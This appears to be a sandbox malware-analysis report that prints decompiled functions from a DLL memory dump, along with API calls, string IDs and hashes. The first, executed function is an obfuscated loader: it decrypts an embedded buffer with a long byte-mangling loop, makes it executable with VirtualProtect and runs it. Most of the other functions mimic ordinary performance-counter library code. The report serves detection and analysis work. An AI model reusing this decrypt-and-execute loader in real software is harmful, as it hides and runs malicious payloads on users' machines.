                • Instruction Fuzzy Hash: 42A1E025E54348EADB60CBE8EC11BBDB7B5AF48B10F20545BE519EE2E0D7710E90DB09
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF83070, Relevance: 6.2, APIs: 4, Instructions: 176memoryCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E6FF83070() {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				long _v20;
				void* _t117;

				_v16 = _v16 & 0x00000000;
				_t117 = RtlAllocateHeap(GetProcessHeap(), 1, 0xbebc200); // executed
				_v16 = _t117;
				if(_v16 != 0) {
					memset(_v16, 0xde, 0xbebc200);
					_v12 = _v12 & 0x00000000;
					_v12 = _v12 & 0x00000000;
					while(_v12 < 0x1547) {
						_t14 =  &E6FF850D8 + _v12; // 0x0
						_v5 =  *_t14;
						_v5 = _v5 & 0x000000ff ^ 0x00000071;
						_v5 = (_v5 & 0x000000ff) - 8;
						_v5 = _v5 & 0x000000ff ^ 0x00000083;
						_v5 = (_v5 & 0x000000ff) + 0x3b;
						_v5 = (_v5 & 0x000000ff) >> 0x00000001 | (_v5 & 0x000000ff) << 0x00000007;
						_v5 = (_v5 & 0x000000ff) - 0xcd;
						_v5 =  ~(_v5 & 0x000000ff);
						_v5 = (_v5 & 0x000000ff) + 0x72;
						_v5 = _v5 & 0x000000ff ^ 0x00000091;
						_v5 = (_v5 & 0x000000ff) - _v12;
						_v5 = _v5 & 0x000000ff ^ _v12;
						_v5 = (_v5 & 0x000000ff) >> 0x00000003 | (_v5 & 0x000000ff) << 0x00000005;
						_v5 = (_v5 & 0x000000ff) + _v12;
						_v5 =  ~(_v5 & 0x000000ff);
						_v5 = (_v5 & 0x000000ff) + 0x51;
						_v5 = _v5 & 0x000000ff ^ _v12;
						_v5 = (_v5 & 0x000000ff) - _v12;
						_v5 = _v5 & 0x000000ff ^ _v12;
						_v5 = (_v5 & 0x000000ff) - 0xa9;
						_v5 = (_v5 & 0x000000ff) >> 0x00000001 | (_v5 & 0x000000ff) << 0x00000007;
						_v5 = (_v5 & 0x000000ff) - _v12;
						_v5 = _v5 & 0x000000ff ^ _v12;
						_v5 =  !(_v5 & 0x000000ff);
						_v5 = _v5 & 0x000000ff ^ 0x00000078;
						_v5 = (_v5 & 0x000000ff) + _v12;
						_v5 = (_v5 & 0x000000ff) >> 0x00000003 | (_v5 & 0x000000ff) << 0x00000005;
						_v5 = _v5 & 0x000000ff ^ _v12;
						_v5 =  ~(_v5 & 0x000000ff);
						_v5 = _v5 & 0x000000ff ^ 0x00000034;
						_v5 =  !(_v5 & 0x000000ff);
						_v5 = (_v5 & 0x000000ff) >> 0x00000001 | (_v5 & 0x000000ff) << 0x00000007;
						_v5 = (_v5 & 0x000000ff) + _v12;
						_v5 =  ~(_v5 & 0x000000ff);
						_v5 =  !(_v5 & 0x000000ff);
						_v5 = (_v5 & 0x000000ff) - 0x81;
						_v5 =  ~(_v5 & 0x000000ff);
						_v5 = (_v5 & 0x000000ff) + 0x47;
						_v5 =  !(_v5 & 0x000000ff);
						_v5 =  ~(_v5 & 0x000000ff);
						_v5 = (_v5 & 0x000000ff) - 0xd2;
						 *((char*)( &E6FF850D8 + _v12)) = _v5;
						_v12 = _v12 + 1;
					}
					VirtualProtect( &E6FF850D8, 0x1547, 0x40,  &_v20); // executed
					E6FF850D8(); // executed
				}
				return 0;
			}








                0x6ff83076
                0x6ff83088
                0x6ff8308e
                0x6ff83095
                0x6ff830a8
                0x6ff830b0
                0x6ff830b4
                0x6ff830c1
                0x6ff830d1
                0x6ff830d7
                0x6ff830e1
                0x6ff830eb
                0x6ff830f7
                0x6ff83101
                0x6ff83113
                0x6ff8311f
                0x6ff83128
                0x6ff83132
                0x6ff8313e
                0x6ff83148
                0x6ff83152
                0x6ff83165
                0x6ff8316f
                0x6ff83178
                0x6ff83182
                0x6ff8318c
                0x6ff83196
                0x6ff831a0
                0x6ff831ac
                0x6ff831be
                0x6ff831c8
                0x6ff831d2
                0x6ff831db
                0x6ff831e5
                0x6ff831ef
                0x6ff83202
                0x6ff8320c
                0x6ff83215
                0x6ff8321f
                0x6ff83228
                0x6ff8323a
                0x6ff83244
                0x6ff8324d
                0x6ff83256
                0x6ff83262
                0x6ff8326b
                0x6ff83275
                0x6ff8327e
                0x6ff83287
                0x6ff83293
                0x6ff8329c
                0x6ff830be
                0x6ff830be
                0x6ff832b7
                0x6ff832c2
                0x6ff832c2
                0x6ff832c9

                APIs
                • GetProcessHeap.KERNEL32(00000001,0BEBC200), ref: 6FF83081
                • RtlAllocateHeap.NTDLL(00000000), ref: 6FF83088
                • memset.MSVCRT ref: 6FF830A8
                • VirtualProtect.KERNELBASE(6FF850D8,00001547,00000040,?), ref: 6FF832B7
                Memory Dump Source
                • Source File: 00000015.00000002.314072296.000000006FF81000.00000020.00020000.sdmp, Offset: 6FF80000, based on PE: true
                • Associated: 00000015.00000002.314061918.000000006FF80000.00000002.00020000.sdmp Download File
                • Associated: 00000015.00000002.314081277.000000006FF84000.00000002.00020000.sdmp Download File
                • Associated: 00000015.00000002.314093288.000000006FF85000.00000040.00020000.sdmp Download File
                • Associated: 00000015.00000002.314106183.000000006FF87000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Heap$AllocateProcessProtectVirtualmemset
                • String ID:
                • API String ID: 173993298-0
                • Opcode ID: 5642052972007ee492d9421f1dcd89b824b7c3b378085212cfc5056466b03442
                • Instruction ID: 75691ab74c273baf09d7a8214c8cd99d08812dc9f1491c5083dbdc8407a31050
                • Opcode Fuzzy Hash: 5642052972007ee492d9421f1dcd89b824b7c3b378085212cfc5056466b03442
                • Instruction Fuzzy Hash: 21815521C5D2D9ADDB02CBF944157FCBFB05E26112F0845C6E4E5B6283C13A838E9B21
                Uniqueness

                Uniqueness Score: -1.00%

                Non-executed Functions

                Function 6FF82880, Relevance: 36.9, APIs: 17, Strings: 4, Instructions: 119synchronizationthreadCOMMON
                Download Yara Rule
                C-Code - Quality: 86%
                			E6FF82880(void* _a4, signed int _a8, intOrPtr _a12) {
				void* _v8;
				long _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				intOrPtr _t45;

				_v8 = _a4;
				_t45 = _a4;
				0x6ff80000("%p %d %p\n", _t45, _a8, _a12);
				EnterCriticalSection(0x6ff850ac);
				if(_v8 == 0 ||  *_v8 != 0x50444830) {
					LeaveCriticalSection(0x6ff850ac);
					return 0xc0000bbc;
				} else {
					0x6ff80000(0);
					if(_t45 == 0) {
						if( *(_v8 + 8) == 0) {
							_v16 = CreateEventW(0, 0, 0, 0);
							 *(_v8 + 0x14) = _v16;
							if(_v16 != 0) {
								L11:
								 *((intOrPtr*)(_v8 + 0x10)) = _a12;
								 *(_v8 + 0xc) = _a8 * 0x3e8;
								_v20 = CreateThread(0, 0, E6FF82EC0, _v8, 0, 0);
								 *(_v8 + 8) = _v20;
								if(_v20 != 0) {
									LeaveCriticalSection(0x6ff850ac);
									return 0;
								}
								_v12 = GetLastError();
								CloseHandle( *(_v8 + 0x14));
								LeaveCriticalSection(0x6ff850ac);
								return _v12;
							}
							_v12 = GetLastError();
							LeaveCriticalSection(0x6ff850ac);
							return _v12;
						}
						_v24 =  *(_v8 + 8);
						SetEvent( *(_v8 + 0x14));
						LeaveCriticalSection(0x6ff850ac);
						WaitForSingleObject(_v24, 0xffffffff);
						EnterCriticalSection(0x6ff850ac);
						if( *_v8 == 0x50444830) {
							CloseHandle( *(_v8 + 8));
							 *(_v8 + 8) = 0;
							goto L11;
						}
						LeaveCriticalSection(0x6ff850ac);
						return 0xc0000bbc;
					}
					LeaveCriticalSection(0x6ff850ac);
					return 0x800007d5;
				}
			}









                0x6ff82889
                0x6ff82894
                0x6ff8289d
                0x6ff828aa
                0x6ff828b4
                0x6ff828c6
                0x00000000
                0x6ff828d6
                0x6ff828d8
                0x6ff828e2
                0x6ff82900
                0x6ff82981
                0x6ff8298a
                0x6ff82991
                0x6ff829ac
                0x6ff829b2
                0x6ff829bf
                0x6ff829d9
                0x6ff829e2
                0x6ff829e9
                0x6ff82a16
                0x00000000
                0x6ff82a1c
                0x6ff829f1
                0x6ff829fb
                0x6ff82a06
                0x00000000
                0x6ff82a0c
                0x6ff82999
                0x6ff829a1
                0x00000000
                0x6ff829a7
                0x6ff82908
                0x6ff82912
                0x6ff8291d
                0x6ff82929
                0x6ff82934
                0x6ff82943
                0x6ff82961
                0x6ff8296a
                0x00000000
                0x6ff8296a
                0x6ff8294a
                0x00000000
                0x6ff82950
                0x6ff828e9
                0x00000000
                0x6ff828ef

                APIs
                • EnterCriticalSection.KERNEL32(6FF850AC), ref: 6FF828AA
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF828C6
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF828E9
                • SetEvent.KERNEL32(?), ref: 6FF82912
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF8291D
                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6FF82929
                • EnterCriticalSection.KERNEL32(6FF850AC), ref: 6FF82934
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF8294A
                • CloseHandle.KERNEL32(?), ref: 6FF82961
                • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 6FF8297B
                • GetLastError.KERNEL32 ref: 6FF82993
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF829A1
                • CreateThread.KERNEL32 ref: 6FF829D3
                • GetLastError.KERNEL32 ref: 6FF829EB
                • CloseHandle.KERNEL32(?), ref: 6FF829FB
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF82A06
                Strings
                Memory Dump Source
                • Source File: 00000015.00000002.314072296.000000006FF81000.00000020.00020000.sdmp, Offset: 6FF80000, based on PE: true
                • Associated: 00000015.00000002.314061918.000000006FF80000.00000002.00020000.sdmp Download File
                • Associated: 00000015.00000002.314081277.000000006FF84000.00000002.00020000.sdmp Download File
                • Associated: 00000015.00000002.314093288.000000006FF85000.00000040.00020000.sdmp Download File
                • Associated: 00000015.00000002.314106183.000000006FF87000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CriticalSection$Leave$CloseCreateEnterErrorEventHandleLast$ObjectSingleThreadWait
                • String ID: %p %d %p$0HDP$0HDP$p-w
                • API String ID: 2526439713-1736687199
                • Opcode ID: 15ee23f421c7cce957212dba39bef2b79a34ef504cfb12fd50ab0481495cd395
                • Instruction ID: 9e26eaaceed103b7c00b2e95c726e841bbef9ce75a078a2b9328904f45becd65
                • Opcode Fuzzy Hash: 15ee23f421c7cce957212dba39bef2b79a34ef504cfb12fd50ab0481495cd395
                • Instruction Fuzzy Hash: 6E514F75910208EFDB04DF98CA49B6EBBB5BF0A321F204185F926AB390D771AE40CF51
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF81EA0, Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 142stringCOMMON
                Download Yara Rule
                C-Code - Quality: 74%
                			E6FF81EA0(WCHAR** _a4, WCHAR* _a8, intOrPtr* _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				short _v36;
				short _v2084;
				int _t80;
				void* _t122;
				void* _t123;
				void* _t124;

				_v12 = 0;
				0x6ff80000("%p %p %p 0x%08x\n", _a4, _a8, _a12, _a16);
				_t124 = _t123 + 0x14;
				if(_a16 != 0) {
					0x6ff80000("unimplemented flags 0x%08x\n", _a16);
					_t124 = _t124 + 8;
				}
				if(_a4 == 0 || _a4[5] == 0 || _a4[1] == 0 || _a12 == 0) {
					return 0xc0000bbd;
				} else {
					 *((short*)(_t122 + 0xfffffffffffff7e0)) = 0;
					if( *_a4 != 0) {
						lstrcatW( &_v2084, 0x6ff86944);
						lstrcatW( &_v2084,  *_a4);
					}
					lstrcatW( &_v2084, 0x6ff8694c);
					lstrcatW( &_v2084, _a4[1]);
					if(_a4[2] != 0) {
						lstrcatW( &_v2084, 0x6ff86950);
						if(_a4[3] != 0) {
							lstrcatW( &_v2084, _a4[3]);
							lstrcatW( &_v2084, 0x6ff86954);
						}
						lstrcatW( &_v2084, _a4[2]);
						_t80 = _a4[4];
						0x6ff80000( &_v36, "#%u", _t80);
						swprintf( &_v36, _t80);
						lstrcatW( &_v2084,  &_v36);
						lstrcatW( &_v2084, 0x6ff86960);
					}
					lstrcatW( &_v2084, 0x6ff86964);
					lstrcatW( &_v2084, _a4[5]);
					_v8 = lstrlenW( &_v2084) + 1;
					if( *_a12 < _v8) {
						_v12 = 0x800007d2;
					} else {
						lstrcpyW(_a8,  &_v2084);
					}
					 *_a12 = _v8;
					return _v12;
				}
			}











                0x6ff81ea9
                0x6ff81ec5
                0x6ff81eca
                0x6ff81ed1
                0x6ff81edc
                0x6ff81ee1
                0x6ff81ee1
                0x6ff81ee8
                0x00000000
                0x6ff81f0c
                0x6ff81f16
                0x6ff81f24
                0x6ff81f32
                0x6ff81f45
                0x6ff81f45
                0x6ff81f57
                0x6ff81f6b
                0x6ff81f78
                0x6ff81f8a
                0x6ff81f97
                0x6ff81fa7
                0x6ff81fb9
                0x6ff81fb9
                0x6ff81fcd
                0x6ff81fd6
                0x6ff81fe3
                0x6ff81ff0
                0x6ff82003
                0x6ff82015
                0x6ff82015
                0x6ff82027
                0x6ff8203b
                0x6ff82051
                0x6ff8205c
                0x6ff82071
                0x6ff8205e
                0x6ff82069
                0x6ff82069
                0x6ff8207e
                0x00000000
                0x6ff82080

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000015.00000002.314072296.000000006FF81000.00000020.00020000.sdmp, Offset: 6FF80000, based on PE: true
                • Associated: 00000015.00000002.314061918.000000006FF80000.00000002.00020000.sdmp Download File
                • Associated: 00000015.00000002.314081277.000000006FF84000.00000002.00020000.sdmp Download File
                • Associated: 00000015.00000002.314093288.000000006FF85000.00000040.00020000.sdmp Download File
                • Associated: 00000015.00000002.314106183.000000006FF87000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: lstrcat$lstrcpylstrlenswprintf
                • String ID: #%u$%p %p %p 0x%08x$unimplemented flags 0x%08x
                • API String ID: 332791676-533629115
                • Opcode ID: 307095165d29ec6393a97fd00ea0ce27c76da4e30f67088b35d1c08d403a74d5
                • Instruction ID: 2adef8c7920b954a05a6c037ac88030944e91c77098ddb34c964dda4b346e77b
                • Opcode Fuzzy Hash: 307095165d29ec6393a97fd00ea0ce27c76da4e30f67088b35d1c08d403a74d5
                • Instruction Fuzzy Hash: B9512875510208ABCB04DF94C984FEA77B9FB49311F048589F9299B341DB36EA98CFA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF817D0, Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 66synchronizationCOMMON
                Download Yara Rule
                C-Code - Quality: 89%
                			E6FF817D0(intOrPtr* _a4) {
				intOrPtr* _v8;
				void* _v12;

				_v8 = _a4;
				0x6ff80000("%p\n", _a4);
				EnterCriticalSection(0x6ff850ac);
				if(_v8 == 0 ||  *_v8 != 0x50444830) {
					LeaveCriticalSection(0x6ff850ac);
					return 0xc0000bbc;
				} else {
					if( *(_v8 + 8) == 0) {
						L7:
						E6FF82C70(_v8);
						LeaveCriticalSection(0x6ff850ac);
						return 0;
					}
					_v12 =  *(_v8 + 8);
					SetEvent( *(_v8 + 0x14));
					LeaveCriticalSection(0x6ff850ac);
					WaitForSingleObject(_v12, 0xffffffff);
					EnterCriticalSection(0x6ff850ac);
					if( *_v8 == 0x50444830) {
						CloseHandle( *(_v8 + 0x14));
						CloseHandle( *(_v8 + 8));
						 *(_v8 + 8) = 0;
						goto L7;
					}
					LeaveCriticalSection(0x6ff850ac);
					return 0;
				}
			}





                0x6ff817d9
                0x6ff817e5
                0x6ff817f2
                0x6ff817fc
                0x6ff8180e
                0x00000000
                0x6ff8181e
                0x6ff81825
                0x6ff8189d
                0x6ff818a1
                0x6ff818ae
                0x00000000
                0x6ff818b4
                0x6ff8182d
                0x6ff81837
                0x6ff81842
                0x6ff8184e
                0x6ff81859
                0x6ff81868
                0x6ff81880
                0x6ff8188d
                0x6ff81896
                0x00000000
                0x6ff81896
                0x6ff8186f
                0x00000000
                0x6ff81875

                APIs
                • EnterCriticalSection.KERNEL32(6FF850AC), ref: 6FF817F2
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF8180E
                • SetEvent.KERNEL32(?), ref: 6FF81837
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF81842
                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 6FF8184E
                • EnterCriticalSection.KERNEL32(6FF850AC), ref: 6FF81859
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF8186F
                • CloseHandle.KERNEL32(?), ref: 6FF81880
                • CloseHandle.KERNEL32(?), ref: 6FF8188D
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF818AE
                Strings
                Memory Dump Source
                • Source File: 00000015.00000002.314072296.000000006FF81000.00000020.00020000.sdmp, Offset: 6FF80000, based on PE: true
                • Associated: 00000015.00000002.314061918.000000006FF80000.00000002.00020000.sdmp Download File
                • Associated: 00000015.00000002.314081277.000000006FF84000.00000002.00020000.sdmp Download File
                • Associated: 00000015.00000002.314093288.000000006FF85000.00000040.00020000.sdmp Download File
                • Associated: 00000015.00000002.314106183.000000006FF87000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CriticalSection$Leave$CloseEnterHandle$EventObjectSingleWait
                • String ID: %p$0HDP$0HDP$p-w
                • API String ID: 549566651-945182506
                • Opcode ID: 3526ad1a7a896d7b7547e9bcb5f31e24576d866e190a1aef4fa4a46a66e01423
                • Instruction ID: 71e4a87e95f6ba6d2cc2665507ea2afcdc4fa5f2683748addafc097dbdd4c64d
                • Opcode Fuzzy Hash: 3526ad1a7a896d7b7547e9bcb5f31e24576d866e190a1aef4fa4a46a66e01423
                • Instruction Fuzzy Hash: 2C215C75910108EFCB00DFE4D549AAE7BB5BF4A321F208294F5229B350DB31AE50CB91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF82EC0, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 46threadsynchronizationCOMMON
                Download Yara Rule
                C-Code - Quality: 92%
                			E6FF82EC0(intOrPtr* _a4) {
				intOrPtr* _v8;
				long _v12;
				void* _v16;
				void* _t29;

				_v8 = _a4;
				_v12 =  *((intOrPtr*)(_v8 + 0xc));
				_v16 =  *((intOrPtr*)(_v8 + 0x14));
				while(WaitForSingleObject(_v16, _v12) == 0x102) {
					EnterCriticalSection(0x6ff850ac);
					if( *_v8 == 0x50444830) {
						_push(_v8);
						E6FF82EB0(_t18);
						_t29 = _t29 + 4;
						if(SetEvent( *(_v8 + 0x10)) != 0) {
							LeaveCriticalSection(0x6ff850ac);
							continue;
						}
						LeaveCriticalSection(0x6ff850ac);
						ExitThread(0);
					}
					LeaveCriticalSection(0x6ff850ac);
					ExitThread(0xc0000bbc);
				}
				ExitThread(0);
			}







                0x6ff82ec9
                0x6ff82ed2
                0x6ff82edb
                0x6ff82ede
                0x6ff82f00
                0x6ff82f0f
                0x6ff82f2a
                0x6ff82f2b
                0x6ff82f30
                0x6ff82f42
                0x6ff82f5c
                0x00000000
                0x6ff82f5c
                0x6ff82f49
                0x6ff82f51
                0x6ff82f51
                0x6ff82f16
                0x6ff82f21
                0x6ff82f21
                0x6ff82ef5

                APIs
                • WaitForSingleObject.KERNEL32(?,?), ref: 6FF82EE6
                • ExitThread.KERNEL32 ref: 6FF82EF5
                • EnterCriticalSection.KERNEL32(6FF850AC), ref: 6FF82F00
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF82F16
                • ExitThread.KERNEL32 ref: 6FF82F21
                Strings
                Memory Dump Source
                • Source File: 00000015.00000002.314072296.000000006FF81000.00000020.00020000.sdmp, Offset: 6FF80000, based on PE: true
                • Associated: 00000015.00000002.314061918.000000006FF80000.00000002.00020000.sdmp Download File
                • Associated: 00000015.00000002.314081277.000000006FF84000.00000002.00020000.sdmp Download File
                • Associated: 00000015.00000002.314093288.000000006FF85000.00000040.00020000.sdmp Download File
                • Associated: 00000015.00000002.314106183.000000006FF87000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CriticalExitSectionThread$EnterLeaveObjectSingleWait
                • String ID: 0HDP$p-w
                • API String ID: 1874301155-3830501846
                • Opcode ID: 90c20fecb2358fadc54298708bfb05b606c4c678fde9d25b6d2e778e6d14fff0
                • Instruction ID: f4264583adce84eda402ce997af3b95af4ddd08ab9722d497e959978e990e2a7
                • Opcode Fuzzy Hash: 90c20fecb2358fadc54298708bfb05b606c4c678fde9d25b6d2e778e6d14fff0
                • Instruction Fuzzy Hash: F2113C7AA10604EFCB04DFE4C549A6E7BB9BF4A311F214098F52697350DB31AA50DB51
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF81C40, Relevance: 13.6, APIs: 6, Strings: 3, Instructions: 80COMMON
                Download Yara Rule
                C-Code - Quality: 82%
                			E6FF81C40(void* __ecx, intOrPtr* _a4, signed char _a8, int* _a12, void* _a16) {
				intOrPtr* _v8;

				_v8 = _a4;
				0x6ff80000("%p %d %p %p\n", _a4, _a8 & 0x000000ff, _a12, _a16, __ecx);
				EnterCriticalSection(0x6ff850ac);
				if(_v8 == 0 ||  *_v8 != 0x50444831) {
					LeaveCriticalSection(0x6ff850ac);
					return 0xc0000bbc;
				} else {
					if(_a12 != 0) {
						if( *_a12 >= 0x48) {
							memset(_a16, 0, 0x48);
							 *((intOrPtr*)(_a16 + 4)) =  *((intOrPtr*)(_v8 + 8));
							 *((intOrPtr*)(_a16 + 0xc)) =  *((intOrPtr*)(_v8 + 0xc));
							 *((intOrPtr*)(_a16 + 0x10)) =  *((intOrPtr*)(_v8 + 0x10));
							 *((intOrPtr*)(_a16 + 0x14)) =  *((intOrPtr*)(_v8 + 0x14));
							 *((intOrPtr*)(_a16 + 0x18)) =  *((intOrPtr*)(_v8 + 0x18));
							 *((intOrPtr*)(_a16 + 0x1c)) =  *((intOrPtr*)(_v8 + 0x1c));
							 *_a12 = 0x48;
							LeaveCriticalSection(0x6ff850ac);
							return 0;
						}
						 *_a12 = 0x48;
						LeaveCriticalSection(0x6ff850ac);
						return 0x800007d2;
					}
					LeaveCriticalSection(0x6ff850ac);
					return 0xc0000bbd;
				}
			}




                0x6ff81c47
                0x6ff81c60
                0x6ff81c6d
                0x6ff81c77
                0x6ff81c89
                0x00000000
                0x6ff81c99
                0x6ff81c9d
                0x6ff81cba
                0x6ff81cdf
                0x6ff81cf0
                0x6ff81cfc
                0x6ff81d08
                0x6ff81d14
                0x6ff81d20
                0x6ff81d2c
                0x6ff81d32
                0x6ff81d3d
                0x00000000
                0x6ff81d43
                0x6ff81cbf
                0x6ff81cca
                0x00000000
                0x6ff81cd0
                0x6ff81ca4
                0x00000000
                0x6ff81caa

                APIs
                • EnterCriticalSection.KERNEL32(6FF850AC), ref: 6FF81C6D
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF81C89
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF81CA4
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF81CCA
                • memset.MSVCRT ref: 6FF81CDF
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF81D3D
                Strings
                Memory Dump Source
                • Source File: 00000015.00000002.314072296.000000006FF81000.00000020.00020000.sdmp, Offset: 6FF80000, based on PE: true
                • Associated: 00000015.00000002.314061918.000000006FF80000.00000002.00020000.sdmp Download File
                • Associated: 00000015.00000002.314081277.000000006FF84000.00000002.00020000.sdmp Download File
                • Associated: 00000015.00000002.314093288.000000006FF85000.00000040.00020000.sdmp Download File
                • Associated: 00000015.00000002.314106183.000000006FF87000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CriticalSection$Leave$Entermemset
                • String ID: %p %d %p %p$1HDP$p-w
                • API String ID: 2581898777-2455463802
                • Opcode ID: bd2cd142d1bd3dc1a2029987f741d39e6c4ebda0376af2b1899dbe036140048e
                • Instruction ID: 7fbcc722d051a8f12852a4e71a99731a150f8dc2b8744c78af989262f8faa46a
                • Opcode Fuzzy Hash: bd2cd142d1bd3dc1a2029987f741d39e6c4ebda0376af2b1899dbe036140048e
                • Instruction Fuzzy Hash: 3831F5B9600209DFCB04CF88C684A9E7BF1BF49314F218199F8269B351D735ED11CBA2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF81B30, Relevance: 13.6, APIs: 6, Strings: 3, Instructions: 80COMMON
                Download Yara Rule
                C-Code - Quality: 82%
                			E6FF81B30(void* __ecx, intOrPtr* _a4, signed char _a8, int* _a12, void* _a16) {
				intOrPtr* _v8;

				_v8 = _a4;
				0x6ff80000("%p %d %p %p\n", _a4, _a8 & 0x000000ff, _a12, _a16, __ecx);
				EnterCriticalSection(0x6ff850ac);
				if(_v8 == 0 ||  *_v8 != 0x50444831) {
					LeaveCriticalSection(0x6ff850ac);
					return 0xc0000bbc;
				} else {
					if(_a12 != 0) {
						if( *_a12 >= 0x48) {
							memset(_a16, 0, 0x48);
							 *((intOrPtr*)(_a16 + 4)) =  *((intOrPtr*)(_v8 + 8));
							 *((intOrPtr*)(_a16 + 0xc)) =  *((intOrPtr*)(_v8 + 0xc));
							 *((intOrPtr*)(_a16 + 0x10)) =  *((intOrPtr*)(_v8 + 0x10));
							 *((intOrPtr*)(_a16 + 0x14)) =  *((intOrPtr*)(_v8 + 0x14));
							 *((intOrPtr*)(_a16 + 0x18)) =  *((intOrPtr*)(_v8 + 0x18));
							 *((intOrPtr*)(_a16 + 0x1c)) =  *((intOrPtr*)(_v8 + 0x1c));
							 *_a12 = 0x48;
							LeaveCriticalSection(0x6ff850ac);
							return 0;
						}
						 *_a12 = 0x48;
						LeaveCriticalSection(0x6ff850ac);
						return 0x800007d2;
					}
					LeaveCriticalSection(0x6ff850ac);
					return 0xc0000bbd;
				}
			}




                0x6ff81b37
                0x6ff81b50
                0x6ff81b5d
                0x6ff81b67
                0x6ff81b79
                0x00000000
                0x6ff81b89
                0x6ff81b8d
                0x6ff81baa
                0x6ff81bcf
                0x6ff81be0
                0x6ff81bec
                0x6ff81bf8
                0x6ff81c04
                0x6ff81c10
                0x6ff81c1c
                0x6ff81c22
                0x6ff81c2d
                0x00000000
                0x6ff81c33
                0x6ff81baf
                0x6ff81bba
                0x00000000
                0x6ff81bc0
                0x6ff81b94
                0x00000000
                0x6ff81b9a

                APIs
                • EnterCriticalSection.KERNEL32(6FF850AC), ref: 6FF81B5D
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF81B79
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF81B94
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF81BBA
                • memset.MSVCRT ref: 6FF81BCF
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF81C2D
                Strings
                Memory Dump Source
                • Source File: 00000015.00000002.314072296.000000006FF81000.00000020.00020000.sdmp, Offset: 6FF80000, based on PE: true
                • Associated: 00000015.00000002.314061918.000000006FF80000.00000002.00020000.sdmp Download File
                • Associated: 00000015.00000002.314081277.000000006FF84000.00000002.00020000.sdmp Download File
                • Associated: 00000015.00000002.314093288.000000006FF85000.00000040.00020000.sdmp Download File
                • Associated: 00000015.00000002.314106183.000000006FF87000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CriticalSection$Leave$Entermemset
                • String ID: %p %d %p %p$1HDP$p-w
                • API String ID: 2581898777-2455463802
                • Opcode ID: 9afd512a9e6091f151f222e9e98f75a72624d53a4b87fa1f9a245df4b0e219fc
                • Instruction ID: b47ffb6cdd1f4ebb81bbc2f625be84e17ca4c34b9107786808a345b272defb3a
                • Opcode Fuzzy Hash: 9afd512a9e6091f151f222e9e98f75a72624d53a4b87fa1f9a245df4b0e219fc
                • Instruction Fuzzy Hash: 5F31E6B9600209DFCB04CF48C544A9E7BF1BF4A314F218599F8269B361D735ED11CBA2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF81290, Relevance: 12.1, APIs: 5, Strings: 3, Instructions: 117COMMON
                Download Yara Rule
                C-Code - Quality: 65%
                			E6FF81290(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _t53;
				intOrPtr* _t56;
				intOrPtr _t67;
				signed int _t96;
				void* _t100;
				void* _t102;
				void* _t103;

				_v16 = _a4;
				_t53 = _a8;
				0x6ff80000(_t53, _a12, _a16);
				0x6ff80000("%p %s %lx %p\n", _a4, _t53);
				_t102 = _t100 + 0x18;
				if(_a8 == 0 || _a16 == 0) {
					return 0xc0000bbd;
				} else {
					EnterCriticalSection(0x6ff850ac);
					if(_v16 == 0 ||  *_v16 != 0x50444830) {
						LeaveCriticalSection(0x6ff850ac);
						return 0xc0000bbc;
					} else {
						_t56 = _a16;
						 *_t56 = 0;
						_v8 = 0;
						while(1) {
							0x6ff80000(0x6ff84170);
							_t103 = _t102 + 4;
							if(_v8 >= _t56) {
								break;
							}
							_t18 = (_v8 << 5) + 0x6ff84174; // 0x6ff86658
							_t74 =  *_t18;
							_t56 = E6FF82D50( *_t18, _a8);
							_t102 = _t103 + 8;
							if(_t56 == 0) {
								_v8 = _v8 + 1;
								continue;
							}
							_v12 = E6FF82BE0(_t56, _t74);
							if(_v12 == 0) {
								LeaveCriticalSection(0x6ff850ac);
								return 0xc0000bbb;
							}
							_t22 = (_v8 << 5) + 0x6ff84174; // 0x6ff86658
							 *((intOrPtr*)(_v12 + 4)) = E6FF82B30(_t74,  *_t22);
							_t27 = (_v8 << 5) + 0x6ff84178; // 0x6ff82c90
